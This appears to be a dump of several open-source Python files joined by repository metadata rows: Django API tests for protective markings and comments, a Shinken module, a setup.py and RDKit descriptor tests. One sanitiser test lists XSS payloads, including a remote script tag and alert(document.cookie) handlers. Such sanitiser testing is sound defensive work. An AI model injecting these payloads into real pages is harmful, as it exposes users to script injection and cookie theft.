self.assertEquals(max_pm['descriptor'], 'LOCSEN,PRIVATE,PERSONAL')
def test_get_max_pm_multiple_codewords(self):
"""Retrieves the max pm"""
codewords=['BANANA1','BANANA2','BANANA3']
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm['codewords']=[codewords[i]]
pm_list.append(pm)
max_pm = api.get_max_pm(pm_list)
self.assertEquals(sorted(max_pm['codewords']), sorted(codewords))
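# Taken together, the tests above characterise api.get_max_pm: the highest
# classification_rank wins, the highest national_caveats_rank is carried
# across, and descriptors/codewords from every PM are merged. A rough sketch
# consistent with these assertions (an illustration, not the real code):
def _sketch_get_max_pm(pm_list):
    max_pm = copy.deepcopy(max(pm_list, key=lambda pm: pm['classification_rank']))
    top_cav = max(pm_list, key=lambda pm: pm['national_caveats_rank'])
    for fld in ('national_caveats_primary_name', 'national_caveats_members',
                'national_caveats_rank'):
        max_pm[fld] = top_cav[fld]
    descriptors, codewords = [], []
    for pm in pm_list:
        if pm['descriptor'] not in descriptors:
            descriptors.append(pm['descriptor'])
        codewords += [cw for cw in pm['codewords'] if cw not in codewords]
    max_pm['descriptor'] = ','.join(descriptors)
    max_pm['codewords'] = codewords
    return max_pm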
#@utils.override_settings(DEBUG=True)
class Test_Max_PM_in_Meta(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# We need another user for comments
user_id2, api_key2 = self.add_user(email='dave@davison.com', first_name='dave', last_name='davidson')
self.headers2 = self.build_headers(user_id2, api_key2)
# We also need a 3rd user because of the unique constraint (applied in code logic) on backs fields
user_id3, api_key3 = self.add_user(email='john@cleese.com', first_name='john', last_name='cleese')
self.headers3 = self.build_headers(user_id3, api_key3)
self.pm = {'classification':'PUBLIC',
'classification_short':'PU',
'classification_rank':0,
'descriptor':'PRIVATE',
'codewords':['THIS','THAT'],
'codewords_short':['T1','T2'],
'national_caveats_primary_name':'ME ONLY',
'national_caveats_members':['1','2','3'],
'national_caveats_rank':2
}
def test_just_project_level_O(self):
""" just pms in the projects - all at O to overcome a bug where PUBLIC wasn't rendering a max pm."""
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
'protective_marking' : self.pm}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(meta['max_pm']['classification'], 'PUBLIC')
def test_just_project_level(self):
""" just pms in the projects """
# Insert a couple of documents
doc = {"title": "Project #1", "description": "First project description in here.", 'protective_marking' : self.pm, "status":"published"}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
doc = {"title": "Project #2", "description": "First project description in here.", 'protective_marking' : self.pm, "status":"published"}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
# Bump the classification on the final one
doc['protective_marking']['classification'] = 'PRIVATE'
doc['protective_marking']['classification_short'] = 'PR'
doc['protective_marking']['classification_rank'] = 2
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(meta['max_pm']['classification'], 'PRIVATE')
def test_include_embedded_level(self):
""" PMs inside the embedded level too """
# Insert a couple of documents
doc = {"title": "Project #1", "description": "First project description in here.", 'protective_marking' : self.pm, "status": "published"}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
doc = {"title": "Project #2", "description": "First project description in here.", 'protective_marking' : self.pm, "status": "published"}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
# Bump the classification on the final one
doc['protective_marking']['classification'] = 'PRIVATE'
doc['protective_marking']['classification_short'] = 'PR'
doc['protective_marking']['classification_rank'] = 2
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
comments_uri = objects[0]['resource_uri'] + 'comments/'
pm = copy.deepcopy(self.pm)
pm['classification'] = 'PERSONAL'
pm['classification_short'] = 'PE'
pm['classification_rank'] = 3
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : pm}
# POST a comment carrying a higher classification
response = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers2)
check = response['location']
response = self.c.get(check)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
#print json.dumps(objects, indent=3)
self.assertEquals(meta['max_pm']['classification'], 'PERSONAL')
#----------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Deletes(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": "First project description in here.",
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published"},
{"title": "The second project.",
"description": "second project description in here.",
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published"}]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
project_url = response['location']
comments_uri = project_url + 'comments/'
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
for i in range(x):
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
x += 1
time.sleep(1)
response = self.c.get(self.resourceListURI('project')+'?data_level=less', **self.headers)
#for x in json.loads(response.content)['objects']:
# print json.dumps(x, indent=4)
def test_delete_comment_decrement_count(self):
""" Delete a comment from an project and check the comment_count reduces """
# Get the id for the project
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
project1_id = objects[1]['id']
# Count the comments
resp = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(resp)
self.assertEquals(objects[0]['comment_count'], 1)
# Delete the comment
path = self.resourceListURI('project')+'%s/comments/0/'%(project1_id)
resp = self.c.delete(path, content_type='application/json', **self.headers)
response = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comment_count'], 0)
def test_delete_when_multiple_comments(self):
""" Create a comment - done in setup
Create another comment - done here
Attempt to delete a comment by specific URI
"""
# Get the project id
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
project1_id = objects[1]['id']
# Build the comments URI
comments_uri = self.resourceDetailURI('project', project1_id)+'comments/'
# Post a new comment
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
# Check there are now 2 comments
response = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comment_count'], 2)
self.assertEquals(len(objects[0]['comments']), 2)
# Delete the first comment
delete_uri = comments_uri + '0/'
resp = self.c.delete(delete_uri, content_type='application/json', **self.headers)
self.assertEquals(resp.status_code, 204)
# Now check that it definitely got deleted
response = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comment_count'], 1)
self.assertEquals(len(objects[0]['comments']), 1)
#@utils.override_settings(DEBUG=True)
class Test_Get_Non_Standard_Fields(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": '<a href="http://www.example.com">First</a> project <b>description</b> in here.',
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published"},
{"title": "The second project.",
"description": "<h2>second</h2> project <b>description</b> in here." + " The quick brown fox jumped over the lazy dog."*10,
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published"}
]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
project_url = response['location']
comments_uri = project_url + 'comments/'
new_comment = {"body" : "perhaps we could <b> extend </b> that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
for i in range(x):
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
x += 1
time.sleep(1)
def test_check_description_snippet(self):
""" Checks we get back a snippet of the description from html """
# Retrieve all results
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
#First doc - short
self.assertEquals(objects[0]['description_snippet'], 'First project description in here.')
self.assertEquals(objects[1]['description_snippet'], 'second project description in here. The quick brown fox jumped over the lazy dog. The quick brown fox jumped over the lazy dog. The quick brown fox jumped over the lazy dog. The quick brown fox jumped over the lazy dog. The quick brown fox...')
class Test_Basic_API_Functions(TestCase):
def test_strip_tags(self):
""" Tests stripping html tags"""
text = """<b><a href="http://www.helloworld.com">this is the text</a></b>"""
text = api_functions.strip_tags(text)
self.assertEquals(text, "this is the text")
def test_smart_truncate_short_string(self):
""" Tests truncating on full words"""
text = "the quick brown fox jumped over the lazy dog."
text = api_functions.smart_truncate(content=text, length=180, suffix='...')
self.assertEquals(text, 'the quick brown fox jumped over the lazy dog.')
def test_smart_truncate(self):
""" Tests truncating on full words"""
text = "the quick brown fox jumped over the lazy dog."
text = api_functions.smart_truncate(content=text, length=18, suffix='...')
self.assertEquals(text, 'the quick brown...')
def test_derive_snippet(self):
""" Tests complete snippet derivation """
text = """<b><a href="http://www.helloworld.com">the quick brown fox jumped over the lazy dog.</a></b>"""
text = api_functions.derive_snippet(text_html=text, chrs=18)
self.assertEquals(text, 'the quick brown...')
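    # For reference, a minimal sketch of the smart_truncate behaviour being
    # exercised above; the real api_functions implementation is not shown
    # here, so treat this as an illustrative assumption:
    #   def smart_truncate(content, length=100, suffix='...'):
    #       if len(content) <= length:
    #           return content
    #       # cut at the last complete word that fits, then add the suffix
    #       return content[:length].rsplit(' ', 1)[0] + suffix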
def test_merge_tag_results(self):
""" Check that 2 lists of dicts get merged correctly - exact match """
project_tags = [{"_id":"hello", "count":1},
{"_id":"world", "count":2},
{"_id":"again", "count":3}]
proj_tags = [{"_id":"hello", "count":1},
{"_id":"world", "count":2},
{"_id":"again", "count":3}]
truth = [{"_id":"hello", "count":2},
{"_id":"world", "count":4},
{"_id":"again", "count":6}]
res = api_functions.merge_tag_results(proj_tags, project_tags)
truth_dict = {}
res_dict = {}
        # This works for 2.6 and 2.7, which the previous version of the code didn't (it only supported 2.7).
for tag in truth:
truth_dict[tag['_id']] = tag['count']
for tag in res:
res_dict[tag['_id']] = tag['count']
for key in truth_dict.keys():
self.assertEquals(truth_dict[key], res_dict[key])
def test_merge_tag_results_gaps(self):
""" Check that 2 lists of dicts get merged correctly - gaps in 1 """
project_tags = [{"_id":"hello", "count":1},
{"_id":"world", "count":2},
{"_id":"again", "count":3}]
proj_tags = [{"_id":"hello", "count":1},
{"_id":"again", "count":3}]
truth = [{"_id":"again", "count":6},
{"_id":"hello", "count":2},
{"_id":"world", "count":2}]
res = api_functions.merge_tag_results(proj_tags, project_tags)
self.assertEquals(truth, res)
def test_cleanup_tags(self):
""" Cleanup the tags submitted from the front-end to avoid XSS risks """
tags = ['<a href="http://badplace.com/script.js">puppies</a>',
'<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>',
"""<IMG SRC="javascript:alert('XSS');">""",
"<IMG SRC=javascript:alert('XSS');>",
"<IMG SRC=JaVaScrIpT:alert('XSS');>",
"""<IMG SRC=`javascript:alert("puppies, 'puppies'");>`""",
'<a onmouseover="alert(document.cookie)">puppies</a>',
'<a onmouseover=alert(document.cookie)>puppies</a>',
'<a onmouseover=alert(document.cookie)>puppies</a>',
'<b>kittens</b>']
clean_tags = api_functions.cleanup_tags(tags)
self.assertEquals(clean_tags, [u'puppies', u'', u'', u'', u'', u'`', u'puppies', u'puppies', u'puppies', u'kittens'])
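# A minimal sketch of the tag stripping exercised by test_strip_tags above,
# assuming a stdlib-only Python 2 implementation; the real api_functions
# module is not shown here, so treat this as illustrative rather than the
# actual code under test.
from HTMLParser import HTMLParser
class TagStripperSketch(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.chunks = []
    def handle_data(self, data):
        # keep only the text nodes, dropping every tag
        self.chunks.append(data)
def strip_tags_sketch(html):
    stripper = TagStripperSketch()
    stripper.feed(html)
    return ''.join(stripper.chunks)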
|
agpl-3.0
| -8,572,646,595,100,724,000 | 46.206424 | 306 | 0.551759 | false |
baloo/shinken
|
shinken/objects/businessimpactmodulation.py
|
1
|
2434
|
#!/usr/bin/env python
#Copyright (C) 2009-2010 :
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
#This file is part of Shinken.
#
#Shinken is free software: you can redistribute it and/or modify
#it under the terms of the GNU Affero General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#Shinken is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Affero General Public License for more details.
#
#You should have received a copy of the GNU Affero General Public License
#along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#The resultmodulation class is used for in-scheduler modulation of results,
#like the return code or the output.
import time
from item import Item, Items
from shinken.property import StringProp, IntegerProp
class Businessimpactmodulation(Item):
    id = 1  # 0 is always special in the database, so we do not take risks here
my_type = 'businessimpactmodulation'
properties = Item.properties.copy()
properties.update({
'business_impact_modulation_name': StringProp(),
'business_impact': IntegerProp(),
'modulation_period': StringProp(default=None),
})
# For debugging purpose only (nice name)
def get_name(self):
return self.business_impact_modulation_name
class Businessimpactmodulations(Items):
name_property = "business_impact_modulation_name"
inner_class = Businessimpactmodulation
def linkify(self, timeperiods):
self.linkify_cm_by_tp(timeperiods)
    # For each modulation we look up its timeperiod by name
    # and replace the name with the Timeperiod object
def linkify_cm_by_tp(self, timeperiods):
for rm in self:
mtp_name = rm.modulation_period.strip()
            # Look up the timeperiod object by its name
            mtp = timeperiods.find_by_name(mtp_name)
if mtp_name != '' and mtp is None:
err = "Error : the business impact modulation '%s' got an unknown modulation_period '%s'" % (rm.get_name(), mtp_name)
rm.configuration_errors.append(err)
rm.modulation_period = mtp
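# Illustrative usage sketch (the surrounding scheduler objects are
# assumptions, not part of this module): after the configuration is parsed,
# linkify() is called with the loaded timeperiods so that each
# modulation_period name is replaced by its Timeperiod object:
#   mods = Businessimpactmodulations(raw_modulation_items)
#   mods.linkify(timeperiods)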
|
agpl-3.0
| -5,847,335,771,418,948,000 | 32.805556 | 133 | 0.689811 | false |
kstaniek/version
|
setup.py
|
1
|
1603
|
"""
Installation script for accelerated upgrade
"""
import codecs
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from version import get_version
import re
import sys
DESCRIPTION = 'Description'
with codecs.open('README.md', 'r', encoding='UTF-8') as readme:
LONG_DESCRIPTION = ''.join(readme)
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
]
packages = [
'vertest',
]
NAME = 'vertest'
# setup_args["version"] = "1.0.0"
setup_args = dict(
name=NAME,
version="1.0.0",
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
author='Klaudiusz Staniek',
author_email='klstanie [at] cisco.com',
url='https://github.com/kstaniek/version',
download_url='https://github.com/kstaniek/version/tarball/{}'.format(get_version()),
keywords='version test',
tests_require=['tox'],
platforms=['any'],
packages=packages,
package_data={'': ['LICENSE', ], },
package_dir={'vertest': 'vertest'},
include_package_data=True,
install_requires=[],
data_files=[],
license='Apache 2.0',
classifiers=CLASSIFIERS,
zip_safe=False
)
if __name__=="__main__":
if 'upload' in sys.argv:
import package
package.__version__.verify(setup_args['version'])
setup(**setup_args)
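# Illustrative invocations (assumptions about the release workflow, not part
# of this file):
#   python setup.py sdist    # build a source distribution
#   python setup.py upload   # also runs the version check guarded above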
|
apache-2.0
| 2,586,842,436,941,875,000 | 23.676923 | 88 | 0.636931 | false |
adalke/rdkit
|
rdkit/Chem/UnitTestGraphDescriptors.2.py
|
1
|
24477
|
# $Id$
#
# Copyright (C) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""unit testing code for graph-theoretical descriptors
"""
from __future__ import print_function
from rdkit import RDConfig
import unittest,os.path
from rdkit import Chem
from rdkit.Chem import GraphDescriptors,MolSurf,Lipinski,Crippen
def feq(n1,n2,tol=1e-4):
return abs(n1-n2)<=tol
class TestCase(unittest.TestCase):
def setUp(self):
if doLong:
print('\n%s: '%self.shortDescription(),end='')
def testBertzCTShort(self):
""" test calculation of Bertz 'C(T)' index
"""
data = [('C=CC=C',21.01955),
('O=CC=O',25.01955),
('FCC(=O)CF',46.7548875),
('O=C1C=CC(=O)C=C1',148.705216),
('C12C(F)=C(O)C(F)C1C(F)=C(O)C(F)2',315.250442),
('C12CC=CCC1C(=O)C3CC=CCC3C(=O)2',321.539522)]
for smi,CT in data:
m = Chem.MolFromSmiles(smi)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-3),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
def _testBertzCTLong(self):
""" test calculation of Bertz 'C(T)' index
NOTE: this is a backwards compatibility test, because of the changes
w.r.t. the treatment of aromatic atoms in the new version, we need
to ignore molecules with aromatic rings...
"""
col = 1
with open(os.path.join(RDConfig.RDCodeDir,'Chem','test_data','PP_descrs_regress.2.csv'),'r') as inF:
lineNum=0
for line in inF:
lineNum+=1
if line[0] != '#':
splitL = line.split(',')
smi = splitL[0]
m = Chem.MolFromSmiles(smi)
assert m,'line %d, smiles: %s'%(lineNum,smi)
useIt=1
for atom in m.GetAtoms():
if atom.GetIsAromatic():
useIt=0
break
if useIt:
tgtVal = float(splitL[col])
try:
val = GraphDescriptors.BertzCT(m)
except Exception:
val = 666
assert feq(val,tgtVal,1e-4),'line %d, mol %s (CT calc = %f) should have CT = %f'%(lineNum,smi,val,tgtVal)
def __testDesc(self,fileN,col,func):
with open(os.path.join(RDConfig.RDCodeDir,'Chem','test_data',fileN),'r') as inF:
lineNum=0
for line in inF:
lineNum+=1
if line[0] != '#':
splitL = line.split(',')
smi = splitL[0]
m = Chem.MolFromSmiles(smi)
assert m,'line %d, smiles: %s'%(lineNum,smi)
useIt=1
if useIt:
tgtVal = float(splitL[col])
if not feq(tgtVal,666.0):
try:
val = func(m)
except Exception:
val = 666
assert feq(val,tgtVal,1e-4),'line %d, mol %s (calc = %f) should have val = %f'%(lineNum,smi,val,tgtVal)
def testChi0Long(self):
""" test calculation of Chi0
"""
col = 2
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.Chi0)
def _testChi0Long2(self):
""" test calculation of Chi0
"""
col = 2
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.Chi0)
def testHallKierAlphaLong(self):
""" test calculation of the Hall-Kier Alpha value
"""
col = 3
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.HallKierAlpha)
def _testHallKierAlphaLong2(self):
""" test calculation of the Hall-Kier Alpha value
"""
col = 3
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.HallKierAlpha)
def testIpc(self):
""" test calculation of Ipc.
"""
data = [('CCCCC',1.40564,11.24511),('CCC(C)C',1.37878, 9.65148),('CC(C)(C)C',0.72193,3.60964),('CN(CC)CCC',1.67982,31.91664),('C1CCCCC1',1.71997,34.39946),('CC1CCCCC1',1.68562,47.19725),('Cc1ccccc1',1.68562,47.19725),('CC(C)=C(C)C',1.36096,13.60964),('C#N',1.00000,2.00000),('OC#N',0.91830,2.75489)]
for smi,res1,res2 in data:
m = Chem.MolFromSmiles(smi)
Ipc = GraphDescriptors.Ipc(m, forceDMat=1)
Ipc_avg = GraphDescriptors.Ipc(m,avg = 1, forceDMat=1)
assert feq(Ipc_avg,res1,1e-3),'mol %s (Ipc_avg=%f) should have Ipc_avg=%f'%(smi,Ipc_avg,res1)
assert feq(Ipc,res2,1e-3),'mol %s (Ipc=%f) should have Ipc=%f'%(smi,Ipc,res2)
Ipc = GraphDescriptors.Ipc(m)
Ipc_avg = GraphDescriptors.Ipc(m,avg = 1)
assert feq(Ipc_avg,res1,1e-3),'2nd pass: mol %s (Ipc_avg=%f) should have Ipc_avg=%f'%(smi,Ipc_avg,res1)
assert feq(Ipc,res2,1e-3),'2nd pass: mol %s (Ipc=%f) should have Ipc=%f'%(smi,Ipc,res2)
def _testIpcLong(self):
""" test calculation of Ipc
"""
col = 4
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.Ipc)
def _testIpcLong2(self):
""" test calculation of Ipc
"""
col = 4
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.Ipc)
def testKappa1(self):
""" test calculation of the Hall-Kier kappa1 value
corrected data from Tables 3 and 6 of Rev. Comp. Chem. vol 2, 367-422, (1991)
"""
data = [('C12CC2C3CC13',2.344),
('C1CCC12CC2',3.061),
('C1CCCCC1',4.167),
('CCCCCC',6.000),
('CCC(C)C1CCC(C)CC1',9.091),
('CC(C)CC1CCC(C)CC1',9.091),
('CC(C)C1CCC(C)CCC1',9.091)
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
kappa = GraphDescriptors.Kappa1(m)
assert feq(kappa,res,1e-3),'mol %s (kappa1=%f) should have kappa1=%f'%(smi,kappa,res)
def testKappa2(self):
""" test calculation of the Hall-Kier kappa2 value
corrected data from Tables 5 and 6 of Rev. Comp. Chem. vol 2, 367-422, (1991)
"""
data = [
('[C+2](C)(C)(C)(C)(C)C',0.667),
('[C+](C)(C)(C)(C)(CC)',1.240),
('C(C)(C)(C)(CCC)',2.3444),
('CC(C)CCCC',4.167),
('CCCCCCC',6.000),
('CCCCCC',5.000),
('CCCCCCC',6.000),
('C1CCCC1',1.440),
('C1CCCC1C',1.633),
('C1CCCCC1',2.222),
('C1CCCCCC1',3.061),
('CCCCC',4.00),
('CC=CCCC',4.740),
('C1=CN=CN1',0.884),
('c1ccccc1',1.606),
('c1cnccc1',1.552),
('n1ccncc1',1.500),
('CCCCF',3.930),
('CCCCCl',4.290),
('CCCCBr',4.480),
('CCC(C)C1CCC(C)CC1',4.133),
('CC(C)CC1CCC(C)CC1',4.133),
('CC(C)C1CCC(C)CCC1',4.133)
]
for smi,res in data:
#print smi
m = Chem.MolFromSmiles(smi)
kappa = GraphDescriptors.Kappa2(m)
assert feq(kappa,res,1e-3),'mol %s (kappa2=%f) should have kappa2=%f'%(smi,kappa,res)
def testKappa3(self):
""" test calculation of the Hall-Kier kappa3 value
corrected data from Tables 3 and 6 of Rev. Comp. Chem. vol 2, 367-422, (1991)
"""
data = [
('C[C+](C)(C)(C)C(C)(C)C',2.000),
('CCC(C)C(C)(C)(CC)',2.380),
('CCC(C)CC(C)CC',4.500),
('CC(C)CCC(C)CC',5.878),
('CC(C)CCCC(C)C',8.000),
('CCC(C)C1CCC(C)CC1',2.500),
('CC(C)CC1CCC(C)CC1',3.265),
('CC(C)C1CCC(C)CCC1',2.844)
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
kappa = GraphDescriptors.Kappa3(m)
assert feq(kappa,res,1e-3),'mol %s (kappa3=%f) should have kappa3=%f'%(smi,kappa,res)
def testKappa3Long(self):
""" test calculation of kappa3
"""
col = 5
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.Kappa3)
def _testKappa3Long2(self):
""" test calculation of kappa3
"""
col = 5
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.Kappa3)
def _testLabuteASALong(self):
""" test calculation of Labute's ASA value
"""
col = 6
self.__testDesc('PP_descrs_regress.csv',col,lambda x:MolSurf.LabuteASA(x,includeHs=1))
def _testLabuteASALong2(self):
""" test calculation of Labute's ASA value
"""
col = 6
self.__testDesc('PP_descrs_regress.2.csv',col,lambda x:MolSurf.LabuteASA(x,includeHs=1))
def _testTPSAShortNCI(self):
" Short TPSA test "
inName = RDConfig.RDDataDir+'/NCI/first_200.tpsa.csv'
with open(inName,'r') as inF:
lines = inF.readlines()
for line in lines:
if line[0] != '#':
line.strip()
smi,ans = line.split(',')
ans = float(ans)
mol = Chem.MolFromSmiles(smi)
calc = MolSurf.TPSA(mol)
assert feq(calc,ans),'bad TPSA for SMILES %s (%.2f != %.2f)'%(smi,calc,ans)
def _testTPSALongNCI(self):
" Long TPSA test "
fileN = 'tpsa_regr.csv'
with open(os.path.join(RDConfig.RDCodeDir,'Chem','test_data',fileN),'r') as inF:
lines = inF.readlines()
lineNo = 0
for line in lines:
lineNo+=1
if line[0] != '#':
line.strip()
smi,ans = line.split(',')
ans = float(ans)
mol = Chem.MolFromSmiles(smi)
assert mol,"line %d, failed for smiles: %s"%(lineNo,smi)
calc = MolSurf.TPSA(mol)
assert feq(calc,ans),'line %d: bad TPSA for SMILES %s (%.2f != %.2f)'%(lineNo,smi,calc,ans)
def testTPSALong(self):
""" test calculation of TPSA
"""
col = 28
self.__testDesc('PP_descrs_regress.csv',col,MolSurf.TPSA)
def _testTPSALong2(self):
""" test calculation of TPSA
"""
col = 28
self.__testDesc('PP_descrs_regress.2.csv',col,MolSurf.TPSA)
def _testLipinskiLong(self):
""" test calculation of Lipinski params
"""
fName = 'PP_descrs_regress.csv'
# we can't do H Acceptors for these pyridine-containing molecules
# because the values will be wrong for EVERY one.
#col = 29
#self.__testDesc(fName,col,Lipinski.NumHAcceptors)
col = 30
self.__testDesc(fName,col,Lipinski.NumHDonors)
col = 31
self.__testDesc(fName,col,Lipinski.NumHeteroatoms)
col = 32
self.__testDesc(fName,col,Lipinski.NumRotatableBonds)
def _testHAcceptorsLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 1
self.__testDesc(fName,col,Lipinski.NumHAcceptors)
def _testHDonorsLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 2
self.__testDesc(fName,col,Lipinski.NumHDonors)
def _testHeterosLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 3
self.__testDesc(fName,col,Lipinski.NumHeteroatoms)
def _testRotBondsLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 4
self.__testDesc(fName,col,Lipinski.NumRotatableBonds)
def _testLogPLong(self):
""" test calculation of Lipinski params
"""
fName = 'PP_descrs_regress.csv'
col = 33
self.__testDesc(fName,col,lambda x:Crippen.MolLogP(x,includeHs=1))
def _testLogPLong2(self):
""" test calculation of Lipinski params
"""
fName = 'PP_descrs_regress.2.csv'
col = 33
self.__testDesc(fName,col,lambda x:Crippen.MolLogP(x,includeHs=1))
def _testMOELong(self):
""" test calculation of MOE-type descriptors
"""
fName = 'PP_descrs_regress.VSA.csv'
col = 1
self.__testDesc(fName,col,MolSurf.SMR_VSA1)
col = 2
self.__testDesc(fName,col,MolSurf.SMR_VSA10)
col = 3
self.__testDesc(fName,col,MolSurf.SMR_VSA2)
col = 4
self.__testDesc(fName,col,MolSurf.SMR_VSA3)
col = 5
self.__testDesc(fName,col,MolSurf.SMR_VSA4)
col = 6
self.__testDesc(fName,col,MolSurf.SMR_VSA5)
col = 7
self.__testDesc(fName,col,MolSurf.SMR_VSA6)
col = 8
self.__testDesc(fName,col,MolSurf.SMR_VSA7)
col = 9
self.__testDesc(fName,col,MolSurf.SMR_VSA8)
col = 10
